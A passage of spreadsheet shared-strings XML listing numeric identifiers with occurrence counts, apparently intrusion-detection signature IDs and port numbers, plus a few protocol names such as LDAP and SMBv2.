  <si>
    <t>2043217 (11), 648 (3), 2019240 (1), 1390 (1)</t>
  </si>
  <si>
    <t>2043217, 648, 2019240, 1390</t>
  </si>
  <si>
    <t>2002752 (4), 2002749 (4), 2034567 (1), 2013028 (1), 2002824 (1), 2101200 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2034567, 2013028, 2002824, 2101200</t>
  </si>
  <si>
    <t>2002752 (4), 2002749 (4), 1200 (1), 2034567 (1), 2013028 (1), 2002824 (1), 2101200 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 1200, 2034567, 2013028, 2002824, 2101200</t>
  </si>
  <si>
    <t>2034567 (1), 2013028 (1), 1200 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 1200</t>
  </si>
  <si>
    <t>2060251 (11), 2060252 (3)</t>
  </si>
  <si>
    <t>2060251 (11), 2060252 (3), 28 (1)</t>
  </si>
  <si>
    <t>2060251, 2060252, 28</t>
  </si>
  <si>
    <t>52676</t>
  </si>
  <si>
    <t>9999</t>
  </si>
  <si>
    <t>86782</t>
  </si>
  <si>
    <t>54827 (204), 13249 (1)</t>
  </si>
  <si>
    <t>54827, 13249</t>
  </si>
  <si>
    <t>2060507 (94), 2002752 (4), 2002749 (4), 2013514 (2), 2100527 (2)</t>
  </si>
  <si>
    <t>2060507, 2002752, 2002749, 2013514, 2100527</t>
  </si>
  <si>
    <t>54827 (204), 2060507 (94), 2002752 (4), 2002749 (4), 2013514 (2), 2100527 (2), 13249 (1)</t>
  </si>
  <si>
    <t>54827, 2060507, 2002752, 2002749, 2013514, 2100527, 13249</t>
  </si>
  <si>
    <t>2013514 (2)</t>
  </si>
  <si>
    <t>2013514</t>
  </si>
  <si>
    <t>54827 (204), 2013514 (2), 13249 (1)</t>
  </si>
  <si>
    <t>54827, 2013514, 13249</t>
  </si>
  <si>
    <t>2002752 (4), 2002749 (4), 2100527 (2)</t>
  </si>
  <si>
    <t>2060507 (94)</t>
  </si>
  <si>
    <t>2060507</t>
  </si>
  <si>
    <t>48370</t>
  </si>
  <si>
    <t>16195, 16250</t>
  </si>
  <si>
    <t>18870</t>
  </si>
  <si>
    <t>5 (22), 7 (2)</t>
  </si>
  <si>
    <t>5, 7</t>
  </si>
  <si>
    <t>2043217 (7), 2016538 (2), 2018959 (1), 2014520 (1)</t>
  </si>
  <si>
    <t>2043217, 2016538, 2018959, 2014520</t>
  </si>
  <si>
    <t>5 (22), 50447 (8), 23861 (3), 15306 (2), 648 (2), 7 (2), 11192 (1), 1200 (1), 1390 (1)</t>
  </si>
  <si>
    <t>5, 50447, 23861, 15306, 648, 7, 11192, 1200, 1390</t>
  </si>
  <si>
    <t>2006409 (7), 2060251 (7), 2043217 (7), 2002752 (2), 2002749 (2), 2021076 (2), 2016538 (2), 2101390 (2), 2006408 (1), 2018959 (1), 2014520 (1), 2101200 (1), 2060252 (1)</t>
  </si>
  <si>
    <t>2006409, 2060251, 2043217, 2002752, 2002749, 2021076, 2016538, 2101390, 2006408, 2018959, 2014520, 2101200, 2060252</t>
  </si>
  <si>
    <t>648 (2), 1200 (1), 1390 (1)</t>
  </si>
  <si>
    <t>2043217 (7), 2018959 (1)</t>
  </si>
  <si>
    <t>2043217, 2018959</t>
  </si>
  <si>
    <t>50447 (8), 23861 (3), 15306 (2), 648 (2), 11192 (1), 1390 (1)</t>
  </si>
  <si>
    <t>50447, 23861, 15306, 648, 11192, 1390</t>
  </si>
  <si>
    <t>2006409 (7), 2043217 (7), 2101390 (2), 2006408 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2006409, 2043217, 2101390, 2006408, 2018959</t>
  </si>
  <si>
    <t>50447 (8), 2006409 (7), 2043217 (7), 23861 (3), 15306 (2), 648 (2), 2101390 (2), 11192 (1), 1390 (1), 2006408 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>50447, 2006409, 2043217, 23861, 15306, 648, 2101390, 11192, 1390, 2006408, 2018959</t>
  </si>
  <si>
    <t>648 (2), 1390 (1)</t>
  </si>
  <si>
    <t>2043217 (7), 648 (2), 2018959 (1), 1390 (1)</t>
  </si>
  <si>
    <t>2043217, 648, 2018959, 1390</t>
  </si>
  <si>
    <t>2016538 (2)</t>
  </si>
  <si>
    <t>2016538</t>
  </si>
  <si>
    <t>5 (22), 7 (2), 2016538 (2)</t>
  </si>
  <si>
    <t>5, 7, 2016538</t>
  </si>
  <si>
    <t>5 (22), 7 (2), 1200 (1)</t>
  </si>
  <si>
    <t>5, 7, 1200</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2021076 (2), 2016538 (2), 2101200 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2021076, 2016538, 2101200</t>
  </si>
  <si>
    <t>5 (22), 7 (2), 2002752 (2), 2002749 (2), 2021076 (2), 2016538 (2), 1200 (1), 2101200 (1)</t>
  </si>
  <si>
    <t>5, 7, 2002752, 2002749, 2021076, 2016538, 1200, 2101200</t>
  </si>
  <si>
    <t>5 (22), 7 (2), 2016538 (2), 1200 (1)</t>
  </si>
  <si>
    <t>5, 7, 2016538, 1200</t>
  </si>
  <si>
    <t>2014520 (1)</t>
  </si>
  <si>
    <t>2014520</t>
  </si>
  <si>
    <t>2060251 (7), 2014520 (1), 2060252 (1)</t>
  </si>
  <si>
    <t>2060251, 2014520, 2060252</t>
  </si>
  <si>
    <t>50447 (41), 47401 (12), 18 (2), 12 (2)</t>
  </si>
  <si>
    <t>50447, 47401, 18, 12</t>
  </si>
  <si>
    <t>2100473 (30), 2002752 (3), 2002749 (3), 2027792 (2), 2027794 (2), 2027793 (2)</t>
  </si>
  <si>
    <t>2100473, 2002752, 2002749, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>50447 (41), 2100473 (30), 47401 (12), 2002752 (3), 2002749 (3), 18 (2), 12 (2), 2027792 (2), 2027794 (2), 2027793 (2)</t>
  </si>
  <si>
    <t>50447, 2100473, 47401, 2002752, 2002749, 18, 12, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>50447 (41)</t>
  </si>
  <si>
    <t>50447 (41), 2027792 (2), 2027794 (2), 2027793 (2)</t>
  </si>
  <si>
    <t>2100473 (30), 2002752 (3), 2002749 (3)</t>
  </si>
  <si>
    <t>2100473, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100473 (30), 2002752 (3), 2002749 (3), 12 (2)</t>
  </si>
  <si>
    <t>2100473, 2002752, 2002749, 12</t>
  </si>
  <si>
    <t>18 (2)</t>
  </si>
  <si>
    <t>18</t>
  </si>
  <si>
    <t>47401 (12), 18 (2)</t>
  </si>
  <si>
    <t>47401, 18</t>
  </si>
  <si>
    <t>12 (2), 28 (1)</t>
  </si>
  <si>
    <t>12, 28</t>
  </si>
  <si>
    <t>23861 (9), 648 (2), 12 (2), 50447 (1), 28 (1), 17458 (1), 1200 (1), 26879 (1)</t>
  </si>
  <si>
    <t>23861, 648, 12, 50447, 28, 17458, 1200, 26879</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2101200 (2), 2006409 (1), 2034567 (1), 2013028 (1), 2002824 (1), 2019240 (1), 2044770 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101200, 2006409, 2034567, 2013028, 2002824, 2019240, 2044770</t>
  </si>
  <si>
    <t>648 (2), 1200 (1)</t>
  </si>
  <si>
    <t>648, 1200</t>
  </si>
  <si>
    <t>2019240 (1)</t>
  </si>
  <si>
    <t>2019240</t>
  </si>
  <si>
    <t>23861 (9), 648 (2), 50447 (1), 17458 (1)</t>
  </si>
  <si>
    <t>23861, 648, 50447, 17458</t>
  </si>
  <si>
    <t>2006409 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>2006409, 2019240</t>
  </si>
  <si>
    <t>23861 (9), 648 (2), 50447 (1), 17458 (1), 2006409 (1), 2019240 (1)</t>
  </si>
  <si>
    <t>23861, 648, 50447, 17458, 2006409, 2019240</t>
  </si>
  <si>
    <t>648 (2)</t>
  </si>
  <si>
    <t>648</t>
  </si>
  <si>
    <t>648 (2), 2019240 (1)</t>
  </si>
  <si>
    <t>648, 2019240</t>
  </si>
  <si>
    <t>12 (2), 2034567 (1), 2013028 (1)</t>
  </si>
  <si>
    <t>12, 2034567, 2013028</t>
  </si>
  <si>
    <t>12 (2), 1200 (1)</t>
  </si>
  <si>
    <t>12, 1200</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2101200 (2), 2034567 (1), 2013028 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101200, 2034567, 2013028, 2002824</t>
  </si>
  <si>
    <t>12 (2), 2002752 (2), 2002749 (2), 2101200 (2), 1200 (1), 2034567 (1), 2013028 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 2101200, 1200, 2034567, 2013028, 2002824</t>
  </si>
  <si>
    <t>12 (2), 2034567 (1), 2013028 (1), 1200 (1)</t>
  </si>
  <si>
    <t>12, 2034567, 2013028, 1200</t>
  </si>
  <si>
    <t>2044770 (1)</t>
  </si>
  <si>
    <t>2044770</t>
  </si>
  <si>
    <t>28 (1), 2044770 (1)</t>
  </si>
  <si>
    <t>28, 2044770</t>
  </si>
  <si>
    <t>28 (1), 26879 (1)</t>
  </si>
  <si>
    <t>28, 26879</t>
  </si>
  <si>
    <t>28 (1), 26879 (1), 2044770 (1)</t>
  </si>
  <si>
    <t>28, 26879, 2044770</t>
  </si>
  <si>
    <t>86786, 86787</t>
  </si>
  <si>
    <t>50447 (14), 33 (1), 18 (1), 3 (1)</t>
  </si>
  <si>
    <t>50447, 33, 18, 3</t>
  </si>
  <si>
    <t>2002749 (3), 2002752 (2), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>2002749, 2002752, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>50447 (14), 2002749 (3), 2002752 (2), 33 (1), 18 (1), 3 (1), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>50447, 2002749, 2002752, 33, 18, 3, 2027792, 2027794, 2027793</t>
  </si>
  <si>
    <t>50447 (14)</t>
  </si>
  <si>
    <t>50447 (14), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>2002749 (3), 2002752 (2)</t>
  </si>
  <si>
    <t>107937798</t>
  </si>
  <si>
    <t>56101, 9999</t>
  </si>
  <si>
    <t>50447 (19), 2027792 (1), 2027794 (1), 2027793 (1)</t>
  </si>
  <si>
    <t>34039</t>
  </si>
  <si>
    <t>12 (5), 1 (1)</t>
  </si>
  <si>
    <t>2000418 (3), 2014906 (1)</t>
  </si>
  <si>
    <t>2000418, 2014906</t>
  </si>
  <si>
    <t>12 (5), 24378 (1), 1 (1)</t>
  </si>
  <si>
    <t>12, 24378, 1</t>
  </si>
  <si>
    <t>2000418 (3), 2002752 (2), 2002749 (2), 2003303 (1), 2003410 (1), 2014906 (1), 2027768 (1)</t>
  </si>
  <si>
    <t>2000418, 2002752, 2002749, 2003303, 2003410, 2014906, 2027768</t>
  </si>
  <si>
    <t>2000418 (3), 2027768 (1)</t>
  </si>
  <si>
    <t>2000418, 2027768</t>
  </si>
  <si>
    <t>12 (5), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2014906 (1)</t>
  </si>
  <si>
    <t>2014906</t>
  </si>
  <si>
    <t>1 (1), 2014906 (1)</t>
  </si>
  <si>
    <t>1, 2014906</t>
  </si>
  <si>
    <t>24378 (1), 1 (1)</t>
  </si>
  <si>
    <t>24378, 1</t>
  </si>
  <si>
    <t>2003303 (1), 2003410 (1), 2014906 (1)</t>
  </si>
  <si>
    <t>2003303, 2003410, 2014906</t>
  </si>
  <si>
    <t>24378 (1), 1 (1), 2003303 (1), 2003410 (1), 2014906 (1)</t>
  </si>
  <si>
    <t>24378, 1, 2003303, 2003410, 2014906</t>
  </si>
  <si>
    <t>15896</t>
  </si>
  <si>
    <t>52175</t>
  </si>
  <si>
    <t>38319 (4), 18469 (4), 402 (1), 44489 (1), 12 (1)</t>
  </si>
  <si>
    <t>38319, 18469, 402, 44489, 12</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 2002752 (2), 2002749 (2), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 2002752, 2002749, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 38319 (4), 18469 (4), 2002752 (2), 2002749 (2), 402 (1), 44489 (1), 12 (1), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 38319, 18469, 2002752, 2002749, 402, 44489, 12, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>38319 (4), 18469 (4), 402 (1)</t>
  </si>
  <si>
    <t>38319, 18469, 402</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 38319 (4), 18469 (4), 402 (1), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059114 (1), 2059107 (1), 2059106 (1), 2059104 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 38319, 18469, 402, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059101, 2059109, 2059103, 2059114, 2059107, 2059106, 2059104</t>
  </si>
  <si>
    <t>19 (4), 12 (3)</t>
  </si>
  <si>
    <t>19, 12</t>
  </si>
  <si>
    <t>4637 (4), 19 (4), 44604 (3), 12 (3), 15935 (1), 44489 (1)</t>
  </si>
  <si>
    <t>4637, 19, 44604, 12, 15935, 44489</t>
  </si>
  <si>
    <t>2026850 (19), 2002752 (3), 2002749 (3), 2036224 (2), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059107 (1), 2059106 (1), 2059104 (1), 2009345 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>2026850, 2002752, 2002749, 2036224, 2044666, 2059098, 2059099, 2059101, 2059109, 2059103, 2059107, 2059106, 2059104, 2009345, 2059102, 2059100</t>
  </si>
  <si>
    <t>2026850 (19), 4637 (4), 19 (4), 44604 (3), 12 (3), 2002752 (3), 2002749 (3), 2036224 (2), 15935 (1), 44489 (1), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059107 (1), 2059106 (1), 2059104 (1), 2009345 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>2026850, 4637, 19, 44604, 12, 2002752, 2002749, 2036224, 15935, 44489, 2044666, 2059098, 2059099, 2059101, 2059109, 2059103, 2059107, 2059106, 2059104, 2009345, 2059102, 2059100</t>
  </si>
  <si>
    <t>4637 (4), 44604 (3), 15935 (1), 44489 (1)</t>
  </si>
  <si>
    <t>4637, 44604, 15935, 44489</t>
  </si>
  <si>
    <t>2026850 (19), 2002752 (3), 2002749 (3), 2009345 (1)</t>
  </si>
  <si>
    <t>2026850, 2002752, 2002749, 2009345</t>
  </si>
  <si>
    <t>2026850 (19), 19 (4), 12 (3), 2002752 (3), 2002749 (3), 2009345 (1)</t>
  </si>
  <si>
    <t>2026850, 19, 12, 2002752, 2002749, 2009345</t>
  </si>
  <si>
    <t>2036224 (2), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059107 (1), 2059106 (1), 2059104 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>2036224, 2044666, 2059098, 2059099, 2059101, 2059109, 2059103, 2059107, 2059106, 2059104, 2059102, 2059100</t>
  </si>
  <si>
    <t>56497, 92322, 95608, 9999</t>
  </si>
  <si>
    <t>ldap</t>
  </si>
  <si>
    <t>2034567 (5), 2013028 (5), 2000418 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 2000418</t>
  </si>
  <si>
    <t>50447 (5), 12 (1)</t>
  </si>
  <si>
    <t>50447, 12</t>
  </si>
  <si>
    <t>2034567 (5), 2013028 (5), 2002824 (5), 2002752 (2), 2002749 (2), 2000418 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 2002824, 2002752, 2002749, 2000418</t>
  </si>
  <si>
    <t>50447 (5), 2034567 (5), 2013028 (5), 2002824 (5), 2002752 (2), 2002749 (2), 12 (1), 2000418 (1)</t>
  </si>
  <si>
    <t>50447, 2034567, 2013028, 2002824, 2002752, 2002749, 12, 2000418</t>
  </si>
  <si>
    <t>50447 (5), 2000418 (1)</t>
  </si>
  <si>
    <t>50447, 2000418</t>
  </si>
  <si>
    <t>2034567 (5), 2013028 (5)</t>
  </si>
  <si>
    <t>2034567 (5), 2013028 (5), 12 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 12</t>
  </si>
  <si>
    <t>2034567 (5), 2013028 (5), 2002824 (5), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2034567 (5), 2013028 (5), 2002824 (5), 2002752 (2), 2002749 (2), 12 (1)</t>
  </si>
  <si>
    <t>2034567, 2013028, 2002824, 2002752, 2002749, 12</t>
  </si>
  <si>
    <t>1917 (13), 24303 (4), 254 (1)</t>
  </si>
  <si>
    <t>1917, 24303, 254</t>
  </si>
  <si>
    <t>1917 (13), 24303 (4), 2100527 (2), 2101620 (2), 254 (1)</t>
  </si>
  <si>
    <t>1917, 24303, 2100527, 2101620, 254</t>
  </si>
  <si>
    <t>2100527 (2), 2101620 (2), 254 (1)</t>
  </si>
  <si>
    <t>2100527, 2101620, 254</t>
  </si>
  <si>
    <t>1917 (13), 24303 (4)</t>
  </si>
  <si>
    <t>1917, 24303</t>
  </si>
  <si>
    <t>1917 (13)</t>
  </si>
  <si>
    <t>50447 (212), 1917 (12)</t>
  </si>
  <si>
    <t>50447, 1917</t>
  </si>
  <si>
    <t>2006409 (212), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2006409, 2002752, 2002749</t>
  </si>
  <si>
    <t>50447 (212), 2006409 (212), 1917 (12), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>50447, 2006409, 1917, 2002752, 2002749</t>
  </si>
  <si>
    <t>50447 (212)</t>
  </si>
  <si>
    <t>2006409 (212)</t>
  </si>
  <si>
    <t>2006409</t>
  </si>
  <si>
    <t>50447 (212), 2006409 (212)</t>
  </si>
  <si>
    <t>50447, 2006409</t>
  </si>
  <si>
    <t>44486 (2), 44484 (2), 44488 (2), 44487 (2), 44485 (2)</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 2002752 (2), 2002749 (2), 2044666 (2), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 2002752, 2002749, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 44486 (2), 44484 (2), 44488 (2), 44487 (2), 44485 (2), 2002752 (2), 2002749 (2), 2044666 (2), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 44486, 44484, 44488, 44487, 44485, 2002752, 2002749, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087</t>
  </si>
  <si>
    <t>2059126 (5), 2051116 (5), 2044666 (2), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1)</t>
  </si>
  <si>
    <t>2059126, 2051116, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087</t>
  </si>
  <si>
    <t>12090</t>
  </si>
  <si>
    <t>31696, 92322</t>
  </si>
  <si>
    <t>ms-ds-smbv2</t>
  </si>
  <si>
    <t>2059126 (3), 2051116 (3), 2002752 (2), 2002749 (2), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1)</t>
  </si>
  <si>
    <t>2059126 (3), 2051116 (3), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1)</t>
  </si>
  <si>
    <t>50447 (268), 58611 (267), 1917 (4), 5 (4)</t>
  </si>
  <si>
    <t>50447, 58611, 1917, 5</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2011085 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2011085</t>
  </si>
  <si>
    <t>50447 (268), 58611 (267), 1917 (4), 5 (4), 2002752 (2), 2002749 (2), 2011085 (1)</t>
  </si>
  <si>
    <t>50447, 58611, 1917, 5, 2002752, 2002749, 2011085</t>
  </si>
  <si>
    <t>50447 (268), 58611 (267)</t>
  </si>
  <si>
    <t>50447, 58611</t>
  </si>
  <si>
    <t>5 (4), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>5, 2002752, 2002749</t>
  </si>
  <si>
    <t>2011085 (1)</t>
  </si>
  <si>
    <t>2011085</t>
  </si>
  <si>
    <t>1917 (4), 2011085 (1)</t>
  </si>
  <si>
    <t>1917, 2011085</t>
  </si>
  <si>
    <t>49480</t>
  </si>
  <si>
    <t>56610, 9999</t>
  </si>
  <si>
    <t>50447 (3)</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2011085 (1), 2016141 (1), 2003595 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2011085, 2016141, 2003595</t>
  </si>
  <si>
    <t>50447 (3), 2002752 (2), 2002749 (2), 2011085 (1), 2016141 (1), 2003595 (1)</t>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2011085, 2016141, 2003595</t>
  </si>
  <si>
    <t>2003595 (1)</t>
  </si>
  <si>
    <t>2003595</t>
  </si>
  <si>
    <t>50447 (3), 2003595 (1)</t>
  </si>
  <si>
    <t>50447, 2003595</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2016141 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2016141</t>
  </si>
  <si>
    <t>19439 (32), 19440 (6)</t>
  </si>
  <si>
    <t>19439, 19440</t>
  </si>
  <si>
    <t>2006446 (29), 2017808 (12), 2010963 (10), 2017337 (6), 2011042 (5), 2016672 (4), 2011037 (2)</t>
  </si>
  <si>
    <t>2006446, 2017808, 2010963, 2017337, 2011042, 2016672, 2011037</t>
  </si>
  <si>
    <t>50447 (51), 19439 (32), 13990 (29), 19440 (6), 24172 (5), 31939 (1)</t>
  </si>
  <si>
    <t>50447, 19439, 13990, 19440, 24172, 31939</t>
  </si>
  <si>
    <t>50447 (51), 19439 (32), 13990 (29), 2017808 (12), 2010963 (10), 19440 (6), 2017337 (6), 24172 (5), 2002749 (4), 2016672 (4), 2011037 (2), 31939 (1), 2020506 (1), 2009004 (1)</t>
  </si>
  <si>
    <t>50447, 19439, 13990, 2017808, 2010963, 19440, 2017337, 24172, 2002749, 2016672, 2011037, 31939, 2020506, 2009004</t>
  </si>
  <si>
    <t>2006446 (29), 2017808 (12), 2010963 (10), 2017337 (6), 2011042 (5), 2011037 (2)</t>
  </si>
  <si>
    <t>2006446, 2017808, 2010963, 2017337, 2011042, 2011037</t>
  </si>
  <si>
    <t>19439 (32), 2006446 (29), 2017808 (12), 2010963 (10), 19440 (6), 2017337 (6), 2011042 (5), 2011037 (2)</t>
  </si>
  <si>
    <t>19439, 2006446, 2017808, 2010963, 19440, 2017337, 2011042, 2011037</t>
  </si>
  <si>
    <t>50447 (51), 19439 (32), 19440 (6), 24172 (5), 31939 (1)</t>
  </si>
  <si>
    <t>50447, 19439, 19440, 24172, 31939</t>
  </si>
  <si>
    <t>50447 (51), 19439 (32), 2017808 (12), 2010963 (10), 19440 (6), 2017337 (6), 24172 (5), 2011037 (2), 31939 (1), 2020506 (1), 2009004 (1)</t>
  </si>
  <si>
    <t>50447, 19439, 2017808, 2010963, 19440, 2017337, 24172, 2011037, 31939, 2020506, 2009004</t>
  </si>
  <si>
    <t>2016672 (4)</t>
  </si>
  <si>
    <t>2016672</t>
  </si>
  <si>
    <t>13990 (29)</t>
  </si>
  <si>
    <t>13990</t>
  </si>
  <si>
    <t>2002749 (4), 2016672 (4)</t>
  </si>
  <si>
    <t>2002749, 2016672</t>
  </si>
  <si>
    <t>13990 (29), 2002749 (4), 2016672 (4)</t>
  </si>
  <si>
    <t>13990, 2002749, 2016672</t>
  </si>
  <si>
    <t>15584</t>
  </si>
  <si>
    <t>15621</t>
  </si>
  <si>
    <t>34050</t>
  </si>
  <si>
    <t>14984, 9999</t>
  </si>
  <si>
    <t>58005</t>
  </si>
  <si>
    <t>30514, 33338, 35823</t>
  </si>
  <si>
    <t>1394 (1), 17107 (1), 37961 (1), 50447 (1), 19439 (1), 17410 (1)</t>
  </si>
  <si>
    <t>1394, 17107, 37961, 50447, 19439, 17410</t>
  </si>
  <si>
    <t>19439 (1), 1394 (1)</t>
  </si>
  <si>
    <t>19439, 1394</t>
  </si>
  <si>
    <t>19 (1)</t>
  </si>
  <si>
    <t>19</t>
  </si>
  <si>
    <t>19 (1), 2034567 (1), 2013028 (1)</t>
  </si>
  <si>
    <t>19, 2034567, 2013028</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 19 (1), 2034567 (1), 2013028 (1), 2002824 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 19, 2034567, 2013028, 2002824</t>
  </si>
  <si>
    <t>2008538 (72), 2053459 (18), 2053468 (15), 2006446 (14), 2053465 (14), 2053480 (4), 2053466 (2), 2017808 (1), 2049400 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>2008538, 2053459, 2053468, 2006446, 2053465, 2053480, 2053466, 2017808, 2049400, 2009815, 2009714</t>
  </si>
  <si>
    <t>19779 (75), 50447 (75), 31939 (73), 15874 (15), 21778 (8), 21777 (4), 1061 (1), 7070 (1), 13990 (1), 1147 (1), 19439 (1)</t>
  </si>
  <si>
    <t>19779, 50447, 31939, 15874, 21778, 21777, 1061, 7070, 13990, 1147, 19439</t>
  </si>
  <si>
    <t>19779 (75), 50447 (75), 2012885 (74), 31939 (73), 2008538 (72), 15874 (15), 2053468 (15), 2053465 (14), 21778 (8), 21777 (4), 2053480 (4), 2002752 (2), 2002749 (2), 1061 (1), 7070 (1), 13990 (1), 1147 (1), 19439 (1), 2006445 (1), 2006446 (1), 2017808 (1), 2049400 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>19779, 50447, 2012885, 31939, 2008538, 15874, 2053468, 2053465, 21778, 21777, 2053480, 2002752, 2002749, 1061, 7070, 13990, 1147, 19439, 2006445, 2006446, 2017808, 2049400, 2009815, 2009714</t>
  </si>
  <si>
    <t>2053459 (18), 2053468 (15), 2006446 (14), 2053465 (14), 2053480 (4), 2053466 (2), 2017808 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>2053459, 2053468, 2006446, 2053465, 2053480, 2053466, 2017808, 2009815, 2009714</t>
  </si>
  <si>
    <t>2053459 (18), 2053468 (15), 2006446 (14), 2053465 (14), 2053480 (4), 2053466 (2), 19439 (1), 2017808 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>2053459, 2053468, 2006446, 2053465, 2053480, 2053466, 19439, 2017808, 2009815, 2009714</t>
  </si>
  <si>
    <t>50447 (75), 31939 (73), 21778 (8), 21777 (4), 1061 (1), 7070 (1), 19439 (1)</t>
  </si>
  <si>
    <t>50447, 31939, 21778, 21777, 1061, 7070, 19439</t>
  </si>
  <si>
    <t>50447 (75), 2012885 (74), 31939 (73), 2053468 (15), 2053465 (14), 21778 (8), 21777 (4), 2053480 (4), 1061 (1), 7070 (1), 19439 (1), 2006445 (1), 2006446 (1), 2017808 (1), 2009815 (1), 2009714 (1)</t>
  </si>
  <si>
    <t>50447, 2012885, 31939, 2053468, 2053465, 21778, 21777, 2053480, 1061, 7070, 19439, 2006445, 2006446, 2017808, 2009815, 2009714</t>
  </si>
  <si>
    <t>1061 (1)</t>
  </si>
  <si>
    <t>1061</t>
  </si>
  <si>
    <t>2053459 (18), 2053468 (15), 2006446 (14), 2053465 (14), 2053480 (4), 2053466 (2), 19439 (1), 2017808 (1), 2009815 (1), 2009714 (1), 1061 (1)</t>
  </si>
  <si>
    <t>2053459, 2053468, 2006446, 2053465, 2053480, 2053466, 19439, 2017808, 2009815, 2009714, 1061</t>
  </si>
  <si>
    <t>2008538 (72), 2049400 (1)</t>
  </si>
  <si>
    <t>2008538, 2049400</t>
  </si>
  <si>
    <t>19779 (75), 15874 (15), 13990 (1), 1147 (1)</t>
  </si>
  <si>
    <t>19779, 15874, 13990, 1147</t>
  </si>
  <si>
    <t>2008538 (72), 2002752 (2), 2002749 (2), 2049400 (1)</t>
  </si>
  <si>
